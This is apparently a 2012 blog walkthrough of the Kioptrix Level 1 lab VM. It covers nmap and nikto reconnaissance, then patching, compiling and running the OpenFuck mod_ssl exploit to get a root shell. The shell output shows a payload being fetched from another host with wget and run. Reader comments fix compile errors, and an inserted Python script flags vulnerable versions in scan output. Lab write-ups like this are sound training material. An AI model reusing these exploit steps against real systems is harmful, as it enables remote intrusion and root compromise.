Sunday, 12 August 2012

Kioptrix Hacking challenge LEVEL 1 part 1 (APACHE)

Hi everyone, in this post I will be demonstrating how to hack Kioptrix Level 1. But what is Kioptrix? It is a Linux distro with lots of vulnerabilities, so we can play with it and test our knowledge. To download it, go to http://www.kioptrix.com/blog/?page_id=135 and use VMware Player to open the files, and you are ready to go.

Now that everything is up and running, we need to discover the IP address of the target machine, because it gets its address via DHCP from your network (by the way, you need a DHCP server in order for this to work). To find out the IP address, let's run an nmap scan on our network that looks for live hosts.

# nmap -sn 172.16.1.0/24
Nmap scan report for 172.16.1.144
Host is up (0.0010s latency).
MAC Address: 00:50:56:AF:5A:B9 (VMware)

Great, now that we have found the IP address, let's see what is running on the host.

# nmap -sV 172.16.1.144

Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-03 16:47 BST
Nmap scan report for 172.16.1.144
Host is up (0.033s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE              VERSION
22/tcp   open  ssh                  OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http                 Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind (rpcbind V2) 2 (rpc #100000)
139/tcp  open  netbios-ssn          Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http             Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status (status V1)   1 (rpc #100024)
MAC Address: 00:50:56:AF:5A:B9 (VMware)


OK, at this point there is a lot to do. We need to find out whether the version running on each open port has a known exploit. To get the proper version and vulnerability ID, let's use nikto to scan the host. I am not going to explain all the vulnerabilities of the distro; I think two is good enough, and you can try other ways to break in yourselves. So I am going to show how to break in using Apache and Samba.
1) cd /pentest/web/nikto/
2) ./nikto.pl -host 172.16.1.144
3) The results (the interesting bits):
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
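As a defensive counterpart to the scans above, here is an added Python example that is not part of the original post: it reads nmap -sV service lines (the ones from the scan above, embedded as constructed input) and flags any Apache or mod_ssl version that falls inside the ranges nikto reported, so an administrator can run the same check over their own scan output.

```python
import re

# Service lines copied from the nmap -sV output in the post; constructed input for this example.
NMAP_OUTPUT = """\
22/tcp   open  ssh                  OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http                 Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
443/tcp  open  ssl/http             Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
"""

# Ranges as nikto reported them, expressed as "vulnerable if version < first fixed version":
# Apache 1.3 below 1.3.27 (CAN-2002-0839), below 1.3.29 (CAN-2003-0542),
# mod_ssl 2.8.7 and lower, i.e. below 2.8.8 (CVE-2002-0082).
CHECKS = [
    (re.compile(r"Apache httpd (\S+)"), "Apache httpd", (1, 3, 27), "CAN-2002-0839"),
    (re.compile(r"Apache httpd (\S+)"), "Apache httpd", (1, 3, 29), "CAN-2003-0542"),
    (re.compile(r"mod_ssl/(\S+)"), "mod_ssl", (2, 8, 8), "CVE-2002-0082"),
]


def parse_version(text):
    """'1.3.20' -> (1, 3, 20); a trailing letter as in '0.9.6b' is ignored."""
    m = re.match(r"\d+(?:\.\d+)*", text)
    return tuple(int(p) for p in m.group(0).split(".")) if m else ()


def find_vulnerable_services(nmap_text):
    """Return (port, component, version, identifier) for every banner inside a flagged range."""
    findings = []
    for line in nmap_text.splitlines():
        m = re.match(r"(\d+)/(?:tcp|udp)\s+open\s+\S+\s+(.*)", line)
        if not m:
            continue  # header, closed-port and MAC address lines carry no banner
        port, banner = int(m.group(1)), m.group(2)
        for rx, component, fixed_in, vuln_id in CHECKS:
            hit = rx.search(banner)
            version = parse_version(hit.group(1)) if hit else ()
            if version and version < fixed_in:  # an unparseable version is not flagged
                findings.append((port, component, ".".join(map(str, version)), vuln_id))
    return findings


if __name__ == "__main__":
    for port, component, version, vuln_id in find_vulnerable_services(NMAP_OUTPUT):
        print(f"{port}/tcp {component} {version}: {vuln_id}")
```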


Right, now we need to google the CVEs, or you can search for the exploit on BackTrack itself. Run:
/pentest/exploits/exploitdb/searchsploit  apache linux remote
Webfroot Shoutbox < 2.32 (Apache) Remote Exploit  /linux/remote/34.pl
Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl   /linux/remote/38.pl
Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit    /linux/remote/126.c
Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit     /linux/remote/132.c
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)/linux/remote/764.c
Apache Tomcat Connector (mod_jk) Remote  Exploit (exec-shield)     /linux/remote/4162.c
Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)     /linux/remote/4552.pl
Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit /linux/remote/5386.txt


As you can see, there is one for OpenSSL (764.c), OpenFuck.
Now, because this is really old, you need to change the exploit a bit in order to make it work.
1) Add: #include <openssl/rc4.h>
2) Add: #include <openssl/md5.h>
3) Search inside the exploit for "wget" and change the URL to the correct one, because the original is not valid anymore. If you google ptrace-kmod.c, you will find that the correct address is:
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
So just change that in the exploit and save it.
Now we need to compile it, but before that we need to install the ssl-dev libraries. Run:
apt-get install libssl-dev
cd /pentest/exploits/exploitdb/platforms/linux/remote
gcc -o OpenFuck 764.c -lcrypto
Run the exploit now:
./OpenFuck
Look for the target. We know that it is running Apache 1.3.20 on Red Hat, so let's filter on that:
./OpenFuck  | grep -i redhat | grep "1.3.20"
That limits the results to only two:
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
So we can try target 0x6a first, and if that doesn't work, we can try 0x6b.
./OpenFuck 0x6a 172.16.1.144 443
Result:
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80fc3f0
Ready to send shellcode
Spawning shell...
Good Bye!

As you can see, that did not work.
Let's try the other one now.
./OpenFuck 0x6b 172.16.1.144 443
Result:
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f83c0
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; ttp://172.16.1.79/ptrace-kmod.c; gcc -
--09:18:29--  http://172.16.1.79/ptrace-kmod.c          => `ptrace-kmod.c'
Connecting to 172.16.1.79:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]    0K ...                   100% @   3.74 MB/s
09:18:29 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
[+] Attached to 17426
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


Success!! We got root on the box.
In the next video I will demonstrate how to hack using Samba.

8 comments:

  2. I get these errors when I try to compile it. I have added the headers to it and everything but it seems like my amazing C experience isn't helping ^,^ ...

    764.c:645:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
    unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘read_ssl_packet’:
    764.c:847:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
    if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
    ^~~~~~~~~~~~~
    764.c:847:19: note: each undeclared identifier is reported only once for each function it appears in
    764.c: In function ‘get_server_hello’:
    764.c:979:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
    if (*(p++) != SSL2_MT_SERVER_HELLO) {
    ^~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘send_client_master_key’:
    764.c:1071:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
    if (pkey->type != EVP_PKEY_RSA) {
    ^~
    764.c: In function ‘get_server_verify’:
    764.c:1148:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
    if (buf[0] != SSL2_MT_SERVER_VERIFY) {
    ^~~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘send_client_finished’:
    764.c:1160:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
    buf[0] = SSL2_MT_CLIENT_FINISHED;
    ^~~~~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘get_server_finished’:
    764.c:1173:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)
    if (buf[0] != SSL2_MT_SERVER_FINISHED) {

    1. You need to install it with: apt-get install libssl1.0-dev

      I had the same issue!!
